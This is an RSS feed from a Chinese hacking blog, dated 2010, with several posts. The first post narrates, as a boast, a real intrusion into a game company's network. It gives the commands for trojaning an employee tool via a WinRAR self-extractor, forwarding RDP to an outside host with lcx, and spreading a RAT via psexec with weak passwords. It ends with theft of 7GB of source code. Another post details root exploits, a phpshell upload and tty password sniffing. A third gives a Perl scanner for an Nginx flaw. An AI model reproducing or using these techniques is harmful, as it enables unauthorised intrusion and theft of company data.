<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
	<channel>
		<title>4C00H'blog</title>
		<link>http://www.muhk.cn/</link>
		<description>墓静而思绪，人静则心死！</description>
		<copyright>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</copyright>
		<generator>SaBlog-X Version 1.6 Build 20080806</generator>
		<lastBuildDate>Sun, 05 Sep 2010 13:02:25 +0000</lastBuildDate>
		<ttl>30</ttl>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=33</guid>
			<title>记一次渗透某游戏公司内网全过程</title>
			<author>muhk</author>
			<description><![CDATA[<div class="content">
<p>文章提交：教主 <br />
<br />
前言:<br />
这篇文章所讲到的渗透思路以及方法适合各位新手和老鸟参考。通过入侵WEB服务器然后进行渗透到游戏公司内部并获取游戏源代码全过程。这次是一次非常顺利的渗透过程，仅限学习参考。<br />
<br />
-----------------------------------------------------第一天-------------------------------------------------------------------<br />
花了3天时间终于拿下了www.xxx.com.tw 的网站服务器.是一款不错的游戏产品。在服务器上找了<br />
大半天找不出一点有用的信息.正准备放弃的时候看到 Ftp文件夹下有一个 员工专用登录器.exe 的程序.<br />
HOHO~觉得有戏。。觉得管理员一定会用这个东西来干嘛..马上把这个东西down到自己的电脑，打开一看原来是游戏管理工具。想了一下这对我也没有什么用啊，唉。不如把马捆到这个上然后替换服务器上的原程序看看管理员会不会下载执行吧。<br />
到网上搜了一个EXE图标提取器，把员工专用登录器.exe的程序图标提取出来。然后用黑洞1.96配了个服务端，花了点时间做了免杀。OK。用Winrar的自释放模式把员工专用登录器.exe和黑洞服务端捆绑在了一起。并传到服务器上覆盖了原来的程序。<br />
;下面的注释自解压脚本命令<br />
Path=%SystemRoot%\<br />
SavePath<br />
Setup=install.exe<br />
Setup=Server.exe<br />
Silent=1<br />
Overwrite=2<br />
-----------------------------------------------------第二天-------------------------------------------------------------------<br />
中午起床后打开黑洞,HOHO果然不出各位的所料。。上线一台 台湾地区的主机。网络类型：内网，WindowsXp 系统。打开屏幕监视..果然就是客服部电脑。正在处理玩家的盗号申诉呢。<br />
我立刻找到在我电脑沉睡已久的Tools3389.exe 传到对方机器。<br />
打开Telnet<br />
c:\tmp\tools3389.exe<br />
运行参数:<br />
无参数 帮助信息[本页]<br />
-O 打开超级终端<br />
-X [端口] 修改终端端口<br />
-K 查看终端服务状态<br />
-C 克隆GUEST账号<br />
-S 查看系统版本<br />
-T XP支持双用户登录<br />
-R 重新启动计算机<br />
-H 帮助信息[本页]<br />
目前终端端口为:3389<br />
c:\tmp\tools3389.exe &ndash;O 3389<br />
接着c:\tmp\tools3389.exe &ndash;T<br />
----------------------------------------------------------------------------------------------------<br />
接下来大家都知道我要做什么了，就是转发3389端口出来渗透内网。找到lcx.exe<br />
cmd: c:\tmp\lcx.exe &ndash;slave xxx.xxx.xxx.xxx 51 127.0.0.1 3389<br />
呵呵,一切是那么的顺利。。熟悉的xp登陆画面就出来了。<br />
克隆了guest帐号登陆。穿了个NT弱口令扫描器到肉鸡里。<br />
net view 看了一下结果发现有4个网段。<br />
用弱口令扫描器扫了全部的网段,结果如下：<br />
1433 Sa 弱口令 17 台<br />
NT-SERVER 弱口令 53 台<br />
内网的安全做的就是差劲。。。。。。<br />
----------------------------------------------------------------------------------------------------<br />
拉了个psexec.exe 然后把我的黑洞服务段也传到肉鸡的c:\tmp目录下。。<br />
经过1个多小时的重复操作:<br />
cmd c:\tmp\psexec.exe \\192.168.5.X &ndash;u administrator &ndash;p 123456 &ndash;c Server.exe &ndash;d<br />
成功上线的肉鸡有42台。<br />
发现192.168.254.X 这个段的机器中了黑洞也不上线，很是纳闷。。于是判断下这个段到底能不能连接外网。<br />
psexec \\192.168.254.20 &ndash;u administrator &ndash;p 123456 cmd<br />
ping www.google.com 结果不出所料。。果然不能连接外网。<br />
这个段到底有什么重要的资料？还不能连接外网呢？在肉鸡上打开3389登录器<br />
连接 192.168.254.20 哇塞。发现一个域 SrcServer 肯定是开发部的域了。还好没有限制内网终端连接。<br />
花了2个多小时翻遍了254这个段的机器。终于发现了游戏的源代码。整整7个G啊。<br />
立刻打包: 7z.exe &ndash;a tzip gamesrc.zip &ldquo;c:\src&rdquo; 打包时间真的的太久了。剩余3个多小时。。。<br />
闲逛一下客服部的网段，发现一个网上邻居的共享文件夹 [FileServer] 看到了一个 内网通 的聊天软件安装端。。如法炮制捆绑上黑洞。。<br />
接着就把游戏源代码拖到了电脑。。。<br />
------------------------------------------------End</p>
</div>]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=33</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-07-12 14:40</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=32</guid>
			<title>入侵某网游服务器小记</title>
			<author>muhk</author>
			<description><![CDATA[<p>没什么技术性,只是想说明现状&nbsp;&nbsp;<br />
<br />
现在想弄钱的入侵者，似乎热衷于入侵网络游戏服务器，盗出游戏服务器程序或是数据库。国内的网络游戏企业，都应该招受过此损失，有暴露出来的，有没暴露出来的。但游戏企业对安全问题理解都十分片面，狭隘!&nbsp;&nbsp;<br />
<br />
　当然，不只是网络游戏企业。近一两年来，入侵者乐此不疲，各种商业数据的偷盗在国内几乎快形成一种&quot;圈内产业&quot;。不论是技术性还是行事组织性都与早年不可同日而语。需求与供应在这里似乎有着完美结合。再看看各地公安网监部门，媒体似乎每天都有报道关于某地公安抓获某黑客的事件。但却似乎没有一起真正成熟的案件。抓到的都是小鱼，大鱼都在偷着乐。原因有没发现没报案的，也有网监部门的技术问题。还有就是官僚主义，公安部门发布所谓的&ldquo;战果&rdquo;也乐此不疲。&nbsp;&nbsp;<br />
<br />
　话不说远了，转入正题。&nbsp;&nbsp;<br />
<br />
　一个好友在国内某网络游戏企业工作，让我帮忙测试他们游戏服务器群的安全性。加上我这段时间闲得无聊，也就答应了。&nbsp;&nbsp;<br />
<br />
　我先下载了游戏客户端程序，得到到了几个游戏服务器的地址。&nbsp;&nbsp;<br />
　游戏帐号在WEB网站上也可以注册，看来游戏中央数据库的调用WEB网站也可以。&nbsp;&nbsp;<br />
　先仔细的检查了一下WEB网站，大部分是PHP+MYSQL的。代码写得还不错，几乎找不到什么突破口。再看看MYSQL，禁止远程连接。查看了其他游戏服务器，都是LINUX系统，都只是开了OPENSSH和游戏服务器程序端口。只有WEB网站多个80，而又没什么可利用的地方。&nbsp;&nbsp;<br />
<br />
　　看上去安全做得不错，但这是种幻象！&nbsp;&nbsp;<br />
<br />
　　随后仔细分析了下游戏客户端程序，我打开SnifferPro以便记录下客户端程序和服务器的所有通信。发现客户端程序有个自动更新功能，我Sniff到是通过FTP去下载更新文件的。但我扫描所有游戏服务器时没发现这个FTP端口啊（8888）。仔细看了一下，原来这个端口连接延时十分长。所以扫描器没发现这个端口。&nbsp;&nbsp;<br />
<br />
　　　意外的从更新过程中，竟然Sniff到一个固定的更新程序的FTP帐户。检查了FTP服务器是ProFTPd，我没直接用这个帐户去溢出ProFtpd。因为这台服务器开了SSH，我直接拿帐户去登陆SSH，获得一个权限极低的shell。&nbsp;&nbsp;<br />
<br />
就像一块布，一但撕开一丁点口子，只要稍一加力，整块布都会随之撕开!&nbsp;&nbsp;<br />
<br />
在系统中寻觅了半天，终于寻找到一个有权限去写的tmp目录。查看了内核版本，用kernel do_brk()的问题溢出提升权限获得了rootshell，没去装rkt，因为只是帮忙测试.&nbsp;&nbsp;<br />
<br />
检查了系统的路由表，发现有一个内网，最后确认是VPN，原来所有游戏服务器之间的连接是通过VPN，防火墙的信任检查，都是通过内网的IP地址。外网访问这些服务器都只能看到22端口和游戏服务程序端口。&nbsp;&nbsp;<br />
<br />
在这台已控制的服务器上下载了一个nmap，扫描了其他服务器，发现其中一台开了Samba,查看了一下版本，存在问题。溢出并获得了rootshell。&nbsp;&nbsp;<br />
<br />
到现在为止以控制两台服务器，我把两台服务器的shadow文件都弄回来，拿jonh跑了一遍，没什么弱智密码。看来密码还设得挺好的。&nbsp;&nbsp;<br />
<br />
逛尤了一会，在开了Samba的服务器上，发现了游戏服务器程序。并随之在game.conf文件中发现了中央数据库的地址和一个数据库帐户。登上去看了一下，数据库太庞大，放弃了dump出来的念头。&nbsp;&nbsp;<br />
<br />
　好象没有必要去分析游戏服务器程序，找出vul，去exp，来撕开其他服务器&nbsp;&nbsp;<br />
<br />
　但从其中的一个名为&quot;weihu&quot;的table中，发现一个后台管理帐户和密码，这个密码大小写互换加数字加符号。&nbsp;&nbsp;<br />
<br />
　我在web网站上找到一个后台入口，并用在数据库得到的帐户登陆成功。发现后台管理系统中有一个上传的功能，而且没检查文件后缀名。存放文件目录也是在web目录之下。上传了一个phpshell,执行命令成功，随后我又获得提升权限为root的shell。&nbsp;&nbsp;<br />
<br />
　发现这台机器上还有个root在上面工作，但正在专注用vi编辑一个文件。没发现我。但我想到一个恶作剧。我给这台web网站服务器装了个能监视tty输入的sniff，随后又skill了那个root，那个root被踢下去没多久，又登陆上来。但我立马就抓到了他的密码。&nbsp;&nbsp;<br />
<br />
　我用这个抓到的密码去登陆其他服务器的SSH，并也用root帐户，都登陆成功。&nbsp;&nbsp;<br />
<br />
　感觉所有服务器的系统都应该是直接拷的盘，因为系统版本和所安装的程序和一些配置大都相同。&nbsp;&nbsp;<br />
<br />
　至此已经控制游戏服务器群的所有服务器，其中还有一台是SMS网关。&nbsp;&nbsp;<br />
<br />
　我们的游戏时间结束。只是因为一个小问题，最后导致整个服务器群被控制，其实这在安全问题上，这是必然会发生的。安全无小事!&nbsp;&nbsp;<br />
<br />
　其实这家企业对安全也有投入，硬件防火墙，支持VPN的。但因为一个程序自动更新的设计上的小失败。导致一切都虚设。&nbsp;&nbsp;<br />
<br />
　随后我把整个过程告诉了我那朋友，听得他立马向他们主管汇报了问题。&nbsp;&nbsp;<br />
<br />
<br />
　如有其他游戏企业被入侵，雷同文章所说，那纯属巧合，本人概不负责!</p>]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=32</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-07-12 14:37</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=25</guid>
			<title>福州至温州</title>
			<author>muhk</author>
			<description><![CDATA[<p>为了一个项目,我碾转了四个城市</p>
<p><a href="http://www.muhk.cn/attachment.php?id=5" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_fd005cccf8eef3ab51725a27229c0860.jpg" border="0" alt="大小: 445.26 K&#13;尺寸: 500 x 375&#13;浏览: 2 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>福州至温州动车组上某黑</p>
<p><a href="http://www.muhk.cn/attachment.php?id=6" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_9549d9a33cc8fa7728d5faa1e2744c64.jpg" border="0" alt="大小: 334.72 K&#13;尺寸: 500 x 375&#13;浏览: 0 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>动车上的长腿列车MM</p>
<p><a href="http://www.muhk.cn/attachment.php?id=7" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_efdc9b47cc6ca163775bd28f5bb8c22a.jpg" border="0" alt="大小: 467.05 K&#13;尺寸: 500 x 375&#13;浏览: 1 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>X庭大酒店房间内无聊的和某2B的渗透工作</p>
<p><a href="http://www.muhk.cn/attachment.php?id=8" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_5d280bfa7b1c516db9306da5d751e046.jpg" border="0" alt="大小: 471.47 K&#13;尺寸: 500 x 375&#13;浏览: 0 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>看完三国再工作</p>
<p><a href="http://www.muhk.cn/attachment.php?id=9" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_e078961d4b9ed3d0efe6229411e8ce69.jpg" border="0" alt="大小: 412.92 K&#13;尺寸: 500 x 375&#13;浏览: 0 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>X市机场拉一下TX背影</p>
<p><a href="http://www.muhk.cn/attachment.php?id=10" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_bd020269930e8b17980811df1ec11322.jpg" border="0" alt="大小: 298.9 K&#13;尺寸: 500 x 375&#13;浏览: 0 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>飞机上无聊的新闻</p>
<p><a href="http://www.muhk.cn/attachment.php?id=11" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_1bd2596d54bc65e590c871c7cc32735d.jpg" border="0" alt="大小: 462.3 K&#13;尺寸: 500 x 375&#13;浏览: 0 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>吃点点心!</p>
<p><a href="http://www.muhk.cn/attachment.php?id=12" target="_blank"><img src="http://www.muhk.cn/attachments/date_201006/thumb_6ad5c41e14e50c86893e42b876c0abdc.jpg" border="0" alt="大小: 416.27 K&#13;尺寸: 500 x 375&#13;浏览: 0 次&#13;点击打开新窗口浏览全图" width="500" height="375" /></a></p>
<p>到达省会!</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=25</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-06-05 13:21</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=24</guid>
			<title>Bug&amp;Exp → Nginx-scan Perl扫描器</title>
			<author>muhk</author>
			<description><![CDATA[<p><strong><font color="#ff0000">
<h2><span><a title="查看 Bug&amp;Exp 的全部文章" href="http://www.1141643.com/?cat=13" rel="category">Bug&amp;Exp</a> </span>&rarr; <a title="Permanent Link to Nginx-scan Perl扫描器" href="http://www.1141643.com/?p=277" rel="bookmark">Nginx-scan Perl扫描器</a></h2>
<h2><br />
#来源1： <a href="http://www.80sec.com/nginx-securit.html">http://www.80sec.com/nginx-securit.html</a><br />
#来源2:&nbsp;&nbsp;<a href="http://www.1141643.com/">http://www.1141643.com</a><br />
use LWP;<br />
use LWP::ConnCache;<br />
my $browser = LWP::UserAgent-&gt;new;<br />
$browser-&gt;timeout( 15 );<br />
my $conncache = LWP::ConnCache-&gt;new;&nbsp;<br />
$browser-&gt;conn_cache($conncache);</h2>
<div class="entry">
<p>#先用列表吧，没有用记事本保存列表再读再扫嘿嘿<br />
my @bbslist1;<br />
push @bbslist1,&rdquo;<a href="http://bbs.xxx.com/robots.txt">http://bbs.xxx.com/robots.txt</a>&ldquo;;<br />
push @bbslist1,&rdquo;<a href="http://bbs.yyy.com/robots.txt">http://bbs.yyy.com/robots.txt</a>&rdquo; ;<br />
push @bbslist1,&rsquo;http://bbs.pctutu.com/robots.txt&rsquo;;<br />
push @bbslist1,&rsquo;http://bbs.yahoo.cn/robots.txt&rsquo;;</p>
<p>#Server: nginx/0.8.13<br />
#Content-Type: text/html</p>
<p>print &ldquo;\t\tNginx漏洞扫描程序 \n\n&rdquo;;<br />
foreach my $url (@bbslist1){<br />
&nbsp; print &ldquo;目前正在扫描：$url\n&rdquo;;<br />
&nbsp;my&nbsp;$response= $browser-&gt;get( $url);<br />
&nbsp;$response-&gt;is_success or say(&ldquo;Failed to get &lsquo;$url&rsquo;:\n&rdquo;, $response-&gt;status_line);<br />
&nbsp;my $servertype = $response-&gt;server;<br />
&nbsp; print &ldquo;$servertype\n&rdquo;;<br />
&nbsp;if ($servertype=~/nginx/){<br />
&nbsp;&nbsp;my $typeold=$response-&gt;content_type;<br />
&nbsp;&nbsp;print &ldquo;$typeold\n&rdquo;;<br />
&nbsp;&nbsp;my $url2=$url.&rsquo;/xysky.php&rsquo;;<br />
&nbsp;&nbsp;my&nbsp;$response2 = $browser-&gt;get( $url2);<br />
&nbsp;&nbsp;$response2-&gt;is_success or say(&ldquo;Failed to get &lsquo;$url2&prime;:\n&rdquo;, $response-&gt;status_line);<br />
&nbsp;&nbsp;my $typenew=$response2-&gt;content_type;<br />
&nbsp;&nbsp;print &ldquo;$typenew\n&rdquo;;<br />
&nbsp;&nbsp;if ($typeold eq $typenew){<br />
&nbsp;&nbsp;&nbsp; print &ldquo;站点 $url 暂没有发现漏洞.\n\n&rdquo;;<br />
&nbsp;&nbsp;}else{<br />
&nbsp;&nbsp;&nbsp; print &ldquo;站点 $url 存在该漏洞.\n\n&rdquo;;<br />
&nbsp;&nbsp;}<br />
&nbsp;}else{<br />
&nbsp;print &ldquo;站点不是nginx,Sorry!\n\n&rdquo;;<br />
&nbsp;}<br />
}</p>
</div>
</font></strong></p>]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=24</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-06-03 11:00</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=19</guid>
			<title>明天开始工作</title>
			<author>muhk</author>
			<description><![CDATA[<p>休息了半个月,公司终于叫俺上班了!</p>
<p>突然间觉得有点不适应.今天某黑客扔了一个菠菜网</p>
<p>说是有巨大的利润空间，具说是此黑客专门去一个地方和另一个黑客</p>
<p>研究了一夜搞下来的。今天老大在睡觉，我刚好有空看了一下</p>
<p>2分钟搞定！<img alt="" border="0" src="http://www.muhk.cn/images/smiles/laugh.gif" />杯具啊~~~~！</p>
<p>&nbsp;</p>]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=19</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-05-23 19:34</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=18</guid>
			<title>终于放心了</title>
			<author>muhk</author>
			<description><![CDATA[<p>从五号到现在.我的心一直悬着，今天终于可以放心了</p>
<p>每一次的力恋，都让我重生！</p>
<p>我也相信重生会让我更好的发挥！更好的飞扬！</p>]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=18</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-05-17 17:43</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=13</guid>
			<title>捐给玉树震灾地区</title>
			<author>muhk</author>
			<description><![CDATA[<p>玉树震灾区</p><br /><br /><a href="http://www.muhk.cn/?action=show&amp;id=13" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=13</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-04-19 18:02</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=11</guid>
			<title>小米给和谐的过程报道！</title>
			<author>muhk</author>
			<description><![CDATA[<p>湖北警方称端掉国内最大黑客培训网站&mdash;&mdash;黑鹰安全网</p><br /><br /><a href="http://www.muhk.cn/?action=show&amp;id=11" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=11</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-04-18 13:41</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=9</guid>
			<title>关于昨天陈工给和谐</title>
			<author>muhk</author>
			<description><![CDATA[<p>foxit reader 0day</p><br /><br /><a href="http://www.muhk.cn/?action=show&amp;id=9" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=9</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-04-17 15:38</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=2</guid>
			<title>关于某人给河蟹</title>
			<author>muhk</author>
			<description><![CDATA[<p>我的第七感告诉我,会有人给河蟹！果然.......</p><br /><br /><a href="http://www.muhk.cn/?action=show&amp;id=2" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=2</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-04-11 00:07</pubDate>
		</item>
		<item>
			<guid>http://www.muhk.cn/?action=show&amp;id=1</guid>
			<title>从美国搬回香港</title>
			<author>muhk</author>
			<description><![CDATA[<p>在feel杆王的支持下，4C把家搬回了香港，感谢一下邪八的ring</p><br /><br /><a href="http://www.muhk.cn/?action=show&amp;id=1" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.muhk.cn/?action=show&amp;id=1</link>
			<category domain="http://www.muhk.cn/?cid=2">心情日记</category>
			<pubDate>2010-04-10 17:01</pubDate>
		</item>
	</channel>
</rss>
